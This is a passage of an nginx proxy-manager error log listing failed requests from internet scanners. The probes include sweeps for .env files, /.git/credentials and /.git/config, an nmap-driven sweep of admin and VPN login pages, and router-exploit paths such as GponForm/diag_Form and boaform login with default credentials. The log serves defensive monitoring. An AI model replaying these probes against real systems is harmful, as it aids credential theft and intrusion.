localhost-nginx-proxy-manager, request: "GET /config/queue.php HTTP/1.1", host: "91.82.83.208" +2026/01/23 15:57:27 [error] 330#330: *31737 open() "/var/www/html/config/services.php" failed (2: No such file or directory), client: 43.134.85.130, server: localhost-nginx-proxy-manager, request: "GET /config/services.php HTTP/1.1", host: "91.82.83.208" +2026/01/23 15:57:30 [error] 332#332: *31740 open() "/var/www/html/info" failed (2: No such file or directory), client: 43.134.85.130, server: localhost-nginx-proxy-manager, request: "GET /info HTTP/1.1", host: "91.82.83.208" +2026/01/23 15:57:34 [error] 332#332: *31742 open() "/var/www/html/phpinfo.php3" failed (2: No such file or directory), client: 43.134.85.130, server: localhost-nginx-proxy-manager, request: "GET /phpinfo.php3 HTTP/1.1", host: "91.82.83.208" +2026/01/23 15:58:10 [error] 331#331: *33232 open() "/var/www/html/login" failed (2: No such file or directory), client: 162.142.125.202, server: localhost-nginx-proxy-manager, request: "GET /login HTTP/1.1", host: "91.82.83.208" +2026/01/23 16:07:37 [error] 331#331: *33240 open() "/var/www/html/actuator/health" failed (2: No such file or directory), client: 20.127.155.221, server: localhost-nginx-proxy-manager, request: "GET /actuator/health HTTP/1.1", host: "91.82.83.208" +2026/01/23 16:20:00 [error] 338#338: *33260 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 89.42.231.200, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.83.208:80" +2026/01/23 17:07:33 [error] 337#337: *33306 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 89.42.231.200, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.83.208:80" +2026/01/23 17:54:16 [error] 337#337: *33315 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 89.42.231.200, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.83.208:80" +2026/01/23 18:18:05 [error] 338#338: *33323 open() "/var/www/html/dispatch.asp" failed (2: No such file or directory), client: 195.3.222.218, server: localhost-nginx-proxy-manager, request: "GET /dispatch.asp HTTP/1.1", host: "91.82.83.208:80" +2026/01/23 18:18:53 [error] 338#338: *33324 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 5.183.209.196, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.83.208:80" +2026/01/23 18:41:36 [error] 338#338: *33332 "/var/www/html/bin/index.html" is not found (2: No such file or directory), client: 204.76.203.18, server: localhost-nginx-proxy-manager, request: "GET /bin/ HTTP/1.1", host: "91.82.83.208:80" +2026/01/23 18:41:57 [error] 338#338: *33333 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 89.42.231.200, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.83.208:80" +2026/01/23 19:28:15 [error] 338#338: *33355 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 89.42.231.200, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.83.208:80" +2026/01/23 19:39:34 [error] 338#338: *33357 open() "/var/www/html/.env" failed (2: No such file or directory), client: 78.153.140.203, server: localhost-nginx-proxy-manager, request: "GET /.env HTTP/1.1", host: "91.82.83.208" +2026/01/23 19:39:35 [error] 339#339: *33358 open() "/var/www/html/admin/.env" failed (2: No such file or directory), client: 78.153.140.203, server: localhost-nginx-proxy-manager, request: "GET /admin/.env HTTP/1.1", host: "91.82.83.208" +2026/01/23 19:39:35 [error] 339#339: *33359 open() "/var/www/html/api/.env" failed (2: No such file or directory), client: 78.153.140.203, server: localhost-nginx-proxy-manager, request: "GET /api/.env HTTP/1.1", host: "91.82.83.208" +2026/01/23 19:39:35 [error] 339#339: *33360 open() "/var/www/html/app/.env" failed (2: No such file or directory), client: 78.153.140.203, server: localhost-nginx-proxy-manager, request: "GET /app/.env HTTP/1.1", host: "91.82.83.208" +2026/01/23 19:39:35 [error] 339#339: *33361 open() "/var/www/html/backend/.env" failed (2: No such file or directory), client: 78.153.140.203, server: localhost-nginx-proxy-manager, request: "GET /backend/.env HTTP/1.1", host: "91.82.83.208" +2026/01/23 19:39:35 [error] 339#339: *33362 open() "/var/www/html/demo/.env" failed (2: No such file or directory), client: 78.153.140.203, server: localhost-nginx-proxy-manager, request: "GET /demo/.env HTTP/1.1", host: "91.82.83.208" +2026/01/23 19:39:35 [error] 339#339: *33363 open() "/var/www/html/dev/.env" failed (2: No such file or directory), client: 78.153.140.203, server: localhost-nginx-proxy-manager, request: "GET /dev/.env HTTP/1.1", host: "91.82.83.208" +2026/01/23 19:39:35 [error] 339#339: *33364 open() "/var/www/html/staging/.env" failed (2: No such file or directory), client: 78.153.140.203, server: localhost-nginx-proxy-manager, request: "GET /staging/.env HTTP/1.1", host: "91.82.83.208" +2026/01/23 19:39:35 [error] 339#339: *33365 open() "/var/www/html/mail/.env" failed (2: No such file or directory), client: 78.153.140.203, server: localhost-nginx-proxy-manager, request: "GET /mail/.env HTTP/1.1", host: "91.82.83.208" +2026/01/23 19:39:35 [error] 339#339: *33366 open() "/var/www/html/m/.env" failed (2: No such file or directory), client: 78.153.140.203, server: localhost-nginx-proxy-manager, request: "GET /m/.env HTTP/1.1", host: "91.82.83.208" +2026/01/23 19:39:36 [error] 339#339: *33367 open() "/var/www/html/remote/.env" failed (2: No such file or directory), client: 78.153.140.203, server: localhost-nginx-proxy-manager, request: "GET /remote/.env HTTP/1.1", host: "91.82.83.208" +2026/01/23 19:39:36 [error] 339#339: *33368 open() "/var/www/html/webmail/.env" failed (2: No such file or directory), client: 78.153.140.203, server: localhost-nginx-proxy-manager, request: "GET /webmail/.env HTTP/1.1", host: "91.82.83.208" +2026/01/23 19:39:36 [error] 339#339: *33369 open() "/var/www/html/server/.env" failed (2: No such file or directory), client: 78.153.140.203, server: localhost-nginx-proxy-manager, request: "GET /server/.env HTTP/1.1", host: "91.82.83.208" +2026/01/23 19:39:36 [error] 339#339: *33370 open() "/var/www/html/vpn/.env" failed (2: No such file or directory), client: 78.153.140.203, server: localhost-nginx-proxy-manager, request: "GET /vpn/.env HTTP/1.1", host: "91.82.83.208" +2026/01/23 19:39:36 [error] 339#339: *33371 open() "/var/www/html/secure/.env" failed (2: No such file or directory), client: 78.153.140.203, server: localhost-nginx-proxy-manager, request: "GET /secure/.env HTTP/1.1", host: "91.82.83.208" +2026/01/23 19:39:36 [error] 339#339: *33372 open() "/var/www/html/shop/.env" failed (2: No such file or directory), client: 78.153.140.203, server: localhost-nginx-proxy-manager, request: "GET /shop/.env HTTP/1.1", host: "91.82.83.208" +2026/01/23 19:39:36 [error] 339#339: *33373 open() "/var/www/html/cloud/.env" failed (2: No such file or directory), client: 78.153.140.203, server: localhost-nginx-proxy-manager, request: "GET /cloud/.env HTTP/1.1", host: "91.82.83.208" +2026/01/23 19:39:37 [error] 340#340: *33374 open() "/var/www/html/portal/.env" failed (2: No such file or directory), client: 78.153.140.203, server: localhost-nginx-proxy-manager, request: "GET /portal/.env HTTP/1.1", host: "91.82.83.208" +2026/01/23 19:39:38 [error] 340#340: *33375 open() "/var/www/html/host/.env" failed (2: No such file or directory), client: 78.153.140.203, server: localhost-nginx-proxy-manager, request: "GET /host/.env HTTP/1.1", host: "91.82.83.208" +2026/01/23 19:39:38 [error] 340#340: *33376 open() "/var/www/html/support/.env" failed (2: No such file or directory), client: 78.153.140.203, server: localhost-nginx-proxy-manager, request: "GET /support/.env HTTP/1.1", host: "91.82.83.208" +2026/01/23 19:39:38 [error] 340#340: *33377 open() "/var/www/html/pop/.env" failed (2: No such file or directory), client: 78.153.140.203, server: localhost-nginx-proxy-manager, request: "GET /pop/.env HTTP/1.1", host: "91.82.83.208" +2026/01/23 19:39:38 [error] 340#340: *33378 open() "/var/www/html/store/.env" failed (2: No such file or directory), client: 78.153.140.203, server: localhost-nginx-proxy-manager, request: "GET /store/.env HTTP/1.1", host: "91.82.83.208" +2026/01/23 19:39:38 [error] 340#340: *33379 open() "/var/www/html/cdn/.env" failed (2: No such file or directory), client: 78.153.140.203, server: localhost-nginx-proxy-manager, request: "GET /cdn/.env HTTP/1.1", host: "91.82.83.208" +2026/01/23 19:39:38 [error] 340#340: *33380 open() "/var/www/html/dashboard/.env" failed (2: No such file or directory), client: 78.153.140.203, server: localhost-nginx-proxy-manager, request: "GET /dashboard/.env HTTP/1.1", host: "91.82.83.208" +2026/01/23 19:39:38 [error] 340#340: *33381 open() "/var/www/html/test/.env" failed (2: No such file or directory), client: 78.153.140.203, server: localhost-nginx-proxy-manager, request: "GET /test/.env HTTP/1.1", host: "91.82.83.208" +2026/01/23 19:39:39 [error] 340#340: *33382 open() "/var/www/html/smtp/.env" failed (2: No such file or directory), client: 78.153.140.203, server: localhost-nginx-proxy-manager, request: "GET /smtp/.env HTTP/1.1", host: "91.82.83.208" +2026/01/23 19:39:39 [error] 340#340: *33383 open() "/var/www/html/ftp/.env" failed (2: No such file or directory), client: 78.153.140.203, server: localhost-nginx-proxy-manager, request: "GET /ftp/.env HTTP/1.1", host: "91.82.83.208" +2026/01/23 19:39:39 [error] 340#340: *33384 open() "/var/www/html/wiki/.env" failed (2: No such file or directory), client: 78.153.140.203, server: localhost-nginx-proxy-manager, request: "GET /wiki/.env HTTP/1.1", host: "91.82.83.208" +2026/01/23 19:39:39 [error] 340#340: *33385 open() "/var/www/html/help/.env" failed (2: No such file or directory), client: 78.153.140.203, server: localhost-nginx-proxy-manager, request: "GET /help/.env HTTP/1.1", host: "91.82.83.208" +2026/01/23 19:39:39 [error] 340#340: *33386 open() "/var/www/html/blog/.env" failed (2: No such file or directory), client: 78.153.140.203, server: localhost-nginx-proxy-manager, request: "GET /blog/.env HTTP/1.1", host: "91.82.83.208" +2026/01/23 20:13:01 [error] 337#337: *33396 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 89.42.231.200, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.83.208:80" +2026/01/23 20:17:29 [error] 337#337: *33398 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 5.61.209.92, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.83.208:80" +2026/01/23 20:21:30 [error] 337#337: *33400 open() "/var/www/html/cgi-bin/luci/;stok=/locale" failed (2: No such file or directory), client: 91.224.92.115, server: localhost-nginx-proxy-manager, request: "GET /cgi-bin/luci/;stok=/locale HTTP/1.1", host: "91.82.83.208:80" +2026/01/23 20:58:37 [error] 337#337: *33412 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 89.42.231.200, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.83.208:80" +2026/01/23 21:58:09 [error] 338#338: *33434 open() "/var/www/html/GponForm/diag_Form" failed (2: No such file or directory), client: 31.173.12.36, server: localhost-nginx-proxy-manager, request: "POST /GponForm/diag_Form?images/ HTTP/1.1", host: "127.0.0.1:80" +2026/01/23 22:28:42 [error] 344#344: *33783 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 89.42.231.200, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.83.208:80" +2026/01/23 22:30:03 [error] 344#344: *33784 open() "/var/www/html/boaform/admin/formLogin" failed (2: No such file or directory), client: 42.53.17.68, server: localhost-nginx-proxy-manager, request: "GET /boaform/admin/formLogin?username=user&psd=user HTTP/1.0" +2026/01/23 22:31:14 [error] 344#344: *33788 open() "/var/www/html/.env" failed (2: No such file or directory), client: 141.98.11.171, server: localhost-nginx-proxy-manager, request: "GET /.env HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/23 22:55:45 [error] 344#344: *33817 open() "/var/www/html/.git/credentials" failed (2: No such file or directory), client: 195.178.110.246, server: localhost-nginx-proxy-manager, request: "GET /.git/credentials HTTP/1.1", host: "91.82.83.208" +2026/01/23 23:14:55 [error] 345#345: *33823 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 89.42.231.200, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.83.208:80" +2026/01/23 23:26:08 [error] 345#345: *33826 open() "/var/www/html/dispatch.asp" failed (2: No such file or directory), client: 195.3.222.218, server: localhost-nginx-proxy-manager, request: "GET /dispatch.asp HTTP/1.1", host: "91.82.83.208:80" +2026/01/23 23:59:28 [error] 345#345: *33838 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 89.42.231.200, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.83.208:80" +2026/01/24 00:16:12 [error] 345#345: *33863 open() "/var/www/html/.git/config" failed (2: No such file or directory), client: 77.83.39.218, server: localhost-nginx-proxy-manager, request: "GET /.git/config HTTP/1.1", host: "91.82.83.208" +2026/01/24 00:45:20 [error] 346#346: *33868 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 89.42.231.200, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.83.208:80" +2026/01/24 01:19:46 [error] 346#346: *33894 open() "/var/www/html/sdk" failed (2: No such file or directory), client: 139.162.173.209, server: localhost-nginx-proxy-manager, request: "POST /sdk HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 01:19:46 [error] 346#346: *33898 open() "/var/www/html/health" failed (2: No such file or directory), client: 139.162.173.209, server: localhost-nginx-proxy-manager, request: "GET /health HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 01:19:46 [error] 347#347: *33899 open() "/var/www/html/rest/applinks/1.0/manifest" failed (2: No such file or directory), client: 139.162.173.209, server: localhost-nginx-proxy-manager, request: "GET /rest/applinks/1.0/manifest HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 01:19:46 [error] 346#346: *33889 open() "/var/www/html/nmaplowercheck1769217584" failed (2: No such file or directory), client: 139.162.173.209, server: localhost-nginx-proxy-manager, request: "GET /nmaplowercheck1769217584 HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 01:19:46 [error] 344#344: *33901 open() "/var/www/html/nmaplowercheck1769217585" failed (2: No such file or directory), client: 139.162.173.209, server: localhost-nginx-proxy-manager, request: "GET /nmaplowercheck1769217585 HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 01:19:46 [error] 347#347: *33900 open() "/var/www/html/index.aspx" failed (2: No such file or directory), client: 139.162.173.209, server: localhost-nginx-proxy-manager, request: "GET /index.aspx HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 01:19:47 [error] 347#347: *33906 open() "/var/www/html/HNAP1" failed (2: No such file or directory), client: 139.162.173.209, server: localhost-nginx-proxy-manager, request: "GET /HNAP1 HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 01:19:47 [error] 347#347: *33907 open() "/var/www/html/confluence/rest/applinks/1.0/manifest" failed (2: No such file or directory), client: 139.162.173.209, server: localhost-nginx-proxy-manager, request: "GET /confluence/rest/applinks/1.0/manifest HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 01:19:47 [error] 347#347: *33909 open() "/var/www/html/main.cfm" failed (2: No such file or directory), client: 139.162.173.209, server: localhost-nginx-proxy-manager, request: "GET /main.cfm HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 01:19:47 [error] 347#347: *33910 open() "/var/www/html/evox/about" failed (2: No such file or directory), client: 139.162.173.209, server: localhost-nginx-proxy-manager, request: "GET /evox/about HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 01:19:47 [error] 347#347: *33915 open() "/var/www/html/human.aspx" failed (2: No such file or directory), client: 139.162.173.209, server: localhost-nginx-proxy-manager, request: "GET /human.aspx?arg12=infotech HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 01:19:47 [error] 347#347: *33917 open() "/var/www/html/dana-cached/hc/HostCheckerInstaller.osx" failed (2: No such file or directory), client: 139.162.173.209, server: localhost-nginx-proxy-manager, request: "GET /dana-cached/hc/HostCheckerInstaller.osx HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 01:19:47 [error] 344#344: *34296 open() "/var/www/html/user" failed (2: No such file or directory), client: 139.162.173.209, server: localhost-nginx-proxy-manager, request: "GET /user HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 01:19:47 [error] 347#347: *34315 open() "/var/www/html/dana-na/nc/nc_gina_ver.txt" failed (2: No such file or directory), client: 139.162.173.209, server: localhost-nginx-proxy-manager, request: "GET /dana-na/nc/nc_gina_ver.txt HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 01:19:47 [error] 345#345: *34317 open() "/var/www/html/webui" failed (2: No such file or directory), client: 139.162.173.209, server: localhost-nginx-proxy-manager, request: "GET /webui HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 01:19:47 [error] 345#345: *34896 open() "/var/www/html/menu.html" failed (2: No such file or directory), client: 139.162.173.209, server: localhost-nginx-proxy-manager, request: "GET /menu.html HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 01:19:47 [error] 346#346: *35418 open() "/var/www/html/login.php" failed (2: No such file or directory), client: 139.162.173.209, server: localhost-nginx-proxy-manager, request: "GET /login.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 01:19:47 [error] 347#347: *35415 "/var/www/html/CFIDE/componentutils/index.html" is not found (2: No such file or directory), client: 139.162.173.209, server: localhost-nginx-proxy-manager, request: "GET /CFIDE/componentutils/ HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 01:19:47 [error] 346#346: *35419 open() "/var/www/html/geoserver/index.html" failed (2: No such file or directory), client: 139.162.173.209, server: localhost-nginx-proxy-manager, request: "GET /geoserver/index.html HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 01:19:47 [error] 346#346: *35420 "/var/www/html/geoserver/index.html" is not found (2: No such file or directory), client: 139.162.173.209, server: localhost-nginx-proxy-manager, request: "GET /geoserver/ HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 01:19:47 [error] 347#347: *35427 "/var/www/html/dashboard/index.html" is not found (2: No such file or directory), client: 139.162.173.209, server: localhost-nginx-proxy-manager, request: "GET /dashboard/ HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 01:19:47 [error] 346#346: *35430 open() "/var/www/html/admin.jhtml" failed (2: No such file or directory), client: 139.162.173.209, server: localhost-nginx-proxy-manager, request: "GET /admin.jhtml HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 01:19:47 [error] 346#346: *35429 open() "/var/www/html/webui" failed (2: No such file or directory), client: 139.162.173.209, server: localhost-nginx-proxy-manager, request: "GET /webui HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 01:19:47 [error] 346#346: *35432 open() "/var/www/html/api/v2/about" failed (2: No such file or directory), client: 139.162.173.209, server: localhost-nginx-proxy-manager, request: "GET /api/v2/about HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 01:19:47 [error] 346#346: *35436 open() "/var/www/html/geoserver/web/wicket/bookmarkable/org.geoserver.web.AboutGeoServerPage" failed (2: No such file or directory), client: 139.162.173.209, server: localhost-nginx-proxy-manager, request: "GET /geoserver/web/wicket/bookmarkable/org.geoserver.web.AboutGeoServerPage HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 01:19:47 [error] 346#346: *35442 open() "/var/www/html/fog/management/index.php" failed (2: No such file or directory), client: 139.162.173.209, server: localhost-nginx-proxy-manager, request: "GET /fog/management/index.php?node=client&sub=logininfo HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 01:19:47 [error] 346#346: *35441 open() "/var/www/html/Account/Login" failed (2: No such file or directory), client: 139.162.173.209, server: localhost-nginx-proxy-manager, request: "GET /Account/Login HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 01:19:47 [error] 346#346: *35443 open() "/var/www/html/cgi-bin/info.cgi" failed (2: No such file or directory), client: 139.162.173.209, server: localhost-nginx-proxy-manager, request: "GET /cgi-bin/info.cgi HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 01:19:48 [error] 346#346: *35445 open() "/var/www/html/webui/index.html" failed (2: No such file or directory), client: 139.162.173.209, server: localhost-nginx-proxy-manager, request: "GET /webui/index.html HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 01:19:48 [error] 347#347: *35449 open() "/var/www/html/api/v1/check-version" failed (2: No such file or directory), client: 139.162.173.209, server: localhost-nginx-proxy-manager, request: "GET /api/v1/check-version HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 01:19:48 [error] 346#346: *35446 open() "/var/www/html/inicio.php" failed (2: No such file or directory), client: 139.162.173.209, server: localhost-nginx-proxy-manager, request: "GET /inicio.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 01:19:48 [error] 347#347: *35453 open() "/var/www/html/magento_version" failed (2: No such file or directory), client: 139.162.173.209, server: localhost-nginx-proxy-manager, request: "GET /magento_version HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 01:19:48 [error] 347#347: *35458 open() "/var/www/html/xml/info.xml" failed (2: No such file or directory), client: 139.162.173.209, server: localhost-nginx-proxy-manager, request: "GET /xml/info.xml HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 01:19:48 [error] 347#347: *35459 open() "/var/www/html/helpdesk/WebObjects/Helpdesk.woa" failed (2: No such file or directory), client: 139.162.173.209, server: localhost-nginx-proxy-manager, request: "GET /helpdesk/WebObjects/Helpdesk.woa HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 01:19:48 [error] 347#347: *35462 "/var/www/html/owa/index.html" is not found (2: No such file or directory), client: 139.162.173.209, server: localhost-nginx-proxy-manager, request: "GET /owa/ HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 01:19:48 [error] 347#347: *35463 open() "/var/www/html/+CSCOE+/logon.html" failed (2: No such file or directory), client: 139.162.173.209, server: localhost-nginx-proxy-manager, request: "GET /+CSCOE+/logon.html HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 01:19:48 [error] 347#347: *35466 open() "/var/www/html/home.jhtml" failed (2: No such file or directory), client: 139.162.173.209, server: localhost-nginx-proxy-manager, request: "GET /home.jhtml HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 01:19:48 [error] 347#347: *35464 open() "/var/www/html/cluster/list.query" failed (2: No such file or directory), client: 139.162.173.209, server: localhost-nginx-proxy-manager, request: "GET /cluster/list.query HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 01:19:48 [error] 347#347: *35468 open() "/var/www/html/apps/zxtm/login.cgi" failed (2: No such file or directory), client: 139.162.173.209, server: localhost-nginx-proxy-manager, request: "GET /apps/zxtm/login.cgi HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 01:19:48 [error] 347#347: *35469 open() "/var/www/html/api/server/version" failed (2: No such file or directory), client: 139.162.173.209, server: localhost-nginx-proxy-manager, request: "GET /api/server/version HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 01:19:48 [error] 347#347: *35475 open() "/var/www/html/administrator/manifests/files/joomla.xml" failed (2: No such file or directory), client: 139.162.173.209, server: localhost-nginx-proxy-manager, request: "GET /administrator/manifests/files/joomla.xml HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 01:19:48 [error] 347#347: *35482 "/var/www/html/owa/index.html" is not found (2: No such file or directory), client: 139.162.173.209, server: localhost-nginx-proxy-manager, request: "GET /owa/ HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 01:19:48 [error] 344#344: *35485 open() "/var/www/html/index.php" failed (2: No such file or directory), client: 139.162.173.209, server: localhost-nginx-proxy-manager, request: "GET /index.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 01:19:48 [error] 344#344: *35488 open() "/var/www/html/versa/login" failed (2: No such file or directory), client: 139.162.173.209, server: localhost-nginx-proxy-manager, request: "GET /versa/login HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 01:19:48 [error] 344#344: *35492 open() "/var/www/html/language/en-GB/en-GB.xml" failed (2: No such file or directory), client: 139.162.173.209, server: localhost-nginx-proxy-manager, request: "GET /language/en-GB/en-GB.xml HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 01:19:48 [error] 344#344: *35493 open() "/var/www/html/info.asp" failed (2: No such file or directory), client: 139.162.173.209, server: localhost-nginx-proxy-manager, request: "GET /info.asp HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 01:19:48 [error] 344#344: *35494 open() "/var/www/html/status" failed (2: No such file or directory), client: 139.162.173.209, server: localhost-nginx-proxy-manager, request: "GET /status HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 01:19:48 [error] 344#344: *35498 open() "/var/www/html/login.html" failed (2: No such file or directory), client: 139.162.173.209, server: localhost-nginx-proxy-manager, request: "GET /login.html HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 01:19:48 [error] 344#344: *35501 open() "/var/www/html/api/version" failed (2: No such file or directory), client: 139.162.173.209, server: localhost-nginx-proxy-manager, request: "GET /api/version HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 01:19:48 [error] 344#344: *35504 open() "/var/www/html/main.html" failed (2: No such file or directory), client: 139.162.173.209, server: localhost-nginx-proxy-manager, request: "GET /main.html HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 01:19:48 [error] 344#344: *35503 "/var/www/html/p/login/index.html" is not found (2: No such file or directory), client: 139.162.173.209, server: localhost-nginx-proxy-manager, request: "GET /p/login/ HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 01:19:48 [error] 344#344: *35513 open() "/var/www/html/cgi-mod/header_logo.cgi" failed (2: No such file or directory), client: 139.162.173.209, server: localhost-nginx-proxy-manager, request: "GET /cgi-mod/header_logo.cgi?size=big HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 01:19:48 [error] 345#345: *35516 open() "/var/www/html/allversions" failed (2: No such file or directory), client: 139.162.173.209, server: localhost-nginx-proxy-manager, request: "GET /allversions HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 01:19:48 [error] 344#344: *35515 open() "/var/www/html/login/login.html" failed (2: No such file or directory), client: 139.162.173.209, server: localhost-nginx-proxy-manager, request: "GET /login/login.html HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 01:19:48 [error] 344#344: *35517 open() "/var/www/html/robots.txt" failed (2: No such file or directory), client: 139.162.173.209, server: localhost-nginx-proxy-manager, request: "GET /robots.txt HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 01:19:48 [error] 344#344: *35524 open() "/var/www/html/lms/db" failed (2: No such file or directory), client: 139.162.173.209, server: localhost-nginx-proxy-manager, request: "GET /lms/db HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 01:19:48 [error] 345#345: *35528 open() "/var/www/html/versions" failed (2: No such file or directory), client: 139.162.173.209, server: localhost-nginx-proxy-manager, request: "GET /versions HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 01:19:48 [error] 344#344: *35526 open() "/var/www/html/r-seenet/index.php" failed (2: No such file or directory), client: 139.162.173.209, server: localhost-nginx-proxy-manager, request: "GET /r-seenet/index.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 01:19:48 [error] 346#346: *35575 open() "/var/www/html/api/vip/i18n/api/v2/translation/products/vRNIUI/versions/1" failed (2: No such file or directory), client: 139.162.173.209, server: localhost-nginx-proxy-manager, request: "GET /api/vip/i18n/api/v2/translation/products/vRNIUI/versions/1 HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 01:19:48 [error] 347#347: *35982 open() "/var/www/html/tos/index.php" failed (2: No such file or directory), client: 139.162.173.209, server: localhost-nginx-proxy-manager, request: "GET /tos/index.php?user/login HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 01:19:49 [error] 345#345: *36329 "/var/www/html/portal/index.html" is not found (2: No such file or directory), client: 139.162.173.209, server: localhost-nginx-proxy-manager, request: "GET /portal/ HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 01:19:49 [error] 344#344: *36412 open() "/var/www/html/dniapi/userInfos" failed (2: No such file or directory), client: 139.162.173.209, server: localhost-nginx-proxy-manager, request: "GET /dniapi/userInfos HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 01:19:49 [error] 346#346: *36754 open() "/var/www/html/login.aspx" failed (2: No such file or directory), client: 139.162.173.209, server: localhost-nginx-proxy-manager, request: "GET /login.aspx HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 01:19:49 [error] 347#347: *36862 open() "/var/www/html/main.php" failed (2: No such file or directory), client: 139.162.173.209, server: localhost-nginx-proxy-manager, request: "GET /main.php HTTP/1.1", host: 